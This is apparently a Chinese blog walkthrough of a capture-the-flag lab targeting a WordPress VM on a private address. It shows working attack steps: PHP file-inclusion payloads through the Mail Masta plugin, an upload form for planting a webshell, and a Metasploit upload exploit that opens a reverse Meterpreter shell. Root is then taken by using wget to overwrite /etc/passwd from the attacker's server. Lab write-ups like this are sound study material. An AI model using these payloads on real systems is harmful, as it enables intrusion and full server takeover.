http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=data://text/plain;base64,PD9waHAgIHBocGluZm8oKTs/Pg==

➜  ~ curl "http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://input" -d "<?php phpinfo();?>"
  • 在PHPinfo里看到支持的协议还挺多的
https, ftps, compress.zlib, php, file, glob, data, http, ftp, compress.bzip2, phar, zip
  • 一句话木马我就不演示了。

文件上传

<form method="POST" action="http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2019&Month=09" enctype="multipart/form-data" >
    <input type="file" name="qqfile"><br>
    <input type="submit" name="Submit" value="Pwn!">
</form>
  • 浏览器打开,选择木马上传,打开上传目录访问木马,就可以了。

CSRF越权

Admin Password: Ignite@123
  • 在Aarti用户的详情里找到了Root密码Ignite@123和第二个flag。
Second Flag: 5DD1CC591CE1569A528E3BCF18CEEB5B

RootPassword: SWduaXRlQDEyMw==
  • 密码都是一样的。

插件认证文件上传

  • 上面有一个利用要用到密码,我都拿到密码了,我还要用exp?
msf5 exploit(unix/webapp/wp_slideshowgallery_upload) > show options 

Module options (exploit/unix/webapp/wp_slideshowgallery_upload):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.116.138  yes       The target address range or CIDR identifier
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /wordpress       yes       The base path to the wordpress application
   VHOST                         no        HTTP server virtual host
   WP_PASSWORD  Ignite@123       yes       Valid password for the provided username
   WP_USER      admin            yes       A valid username


Exploit target:

   Id  Name
   --  ----
   0   WP SlideShow Gallery 1.4.6


msf5 exploit(unix/webapp/wp_slideshowgallery_upload) > run 

[*] Started reverse TCP handler on 192.168.116.1:4444 
[*] Trying to login as admin
[*] Trying to upload payload
[*] Uploading payload
[*] Calling uploaded file gxwuywll.php
[*] Sending stage (38247 bytes) to 192.168.116.138
[*] Meterpreter session 2 opened (192.168.116.1:4444 -> 192.168.116.138:41014) at 2019-09-26 18:24:09 +0800
[+] Deleted gxwuywll.php

meterpreter >
  • 情节需要,不管了。

提Root权权限

  • 随便选一个session,进入Shell,查找SUID权限文件。
meterpreter > shell
Process 2084 created.
Channel 0 created.
www-data@ubuntu:/var/www$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/arping
/usr/bin/wget
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/vmware-user-suid-wrapper
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping
/bin/cp
/bin/su
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
www-data@ubuntu:/var/www$
  • 看到有cp和wget命令,两个都能覆盖文件,就是把passwd文件改了
www-data@ubuntu:/etc$ wget -O passwd http://192.168.116.1:8000/passwd
wget -O passwd http://192.168.116.1:8000/passwd
ERROR: could not open HSTS store. HSTS will be disabled.
--2019-09-26 11:54:08--  http://192.168.116.1:8000/passwd
Connecting to 192.168.116.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2557 (2.5K) [application/octet-stream]
Saving to: 'passwd'

passwd              100%[===================>]   2.50K  --.-KB/s    in 0.001s  

2019-09-26 11:54:08 (2.86 MB/s) - 'passwd' saved [2557/2557]

www-data@ubuntu:/etc$ cat passwd
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
raj:x:1000:1000:raj,,,:/home/raj:/bin/bash
mysql:x:122:128:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:124:65534::/run/sshd:/usr/sbin/nologin
kt:$1$kt$mR/jSFSDV/G0vNQ72T8cs.:0:0:root:/root:/bin/bash
www-data@ubuntu:/etc$ su kt
su kt
Password: 123

root@ubuntu:/etc# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/etc#

获取Flag

root@ubuntu:/etc# cd /root
cd /root
root@ubuntu:~# ls
ls
proof.txt
root@ubuntu:~# cat proof.txt
cat proof.txt
_________________________________________________________________________
 _____     _   _   U _____ u     U _____ u   _   _       ____     	|	
 |_ " _|   |'| |'|  \| ___"|/     \| ___"|/  | \ |"|     |  _"\   	|
   | |    /| |_| |\  |  _|"        |  _|"   <|  \| |>   /| | | |  	|	
  /| |\   U|  _  |u  | |___        | |___   U| |\  |u   U| |_| |\ 	|
 u |_|U    |_| |_|   |_____|       |_____|   |_| \_|     |____/ u 	|
 _// \\_   //   \\   <<   >>       <<   >>   ||   \\,-.   |||_    	|
(__) (__) (_") ("_) (__) (__)     (__) (__)  (_")  (_/   (__)_)   	|
									|
									|
!! Congrats you have finished this task !!				|
									|
Contact us here:							|
									|
Hacking Articles : https://twitter.com/rajchandel/			|
									|
									|
+-+-+-+-+-+ +-+-+-+-+-+-+-+						|
 |E|n|j|o|y| |H|A|C|K|I|N|G|						|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+						|
________________________________________________________________________|

                                                

root@ubuntu:~#
posted @ 2020-01-19 09:22  三米前有蕉皮  阅读(...)  评论(...编辑  收藏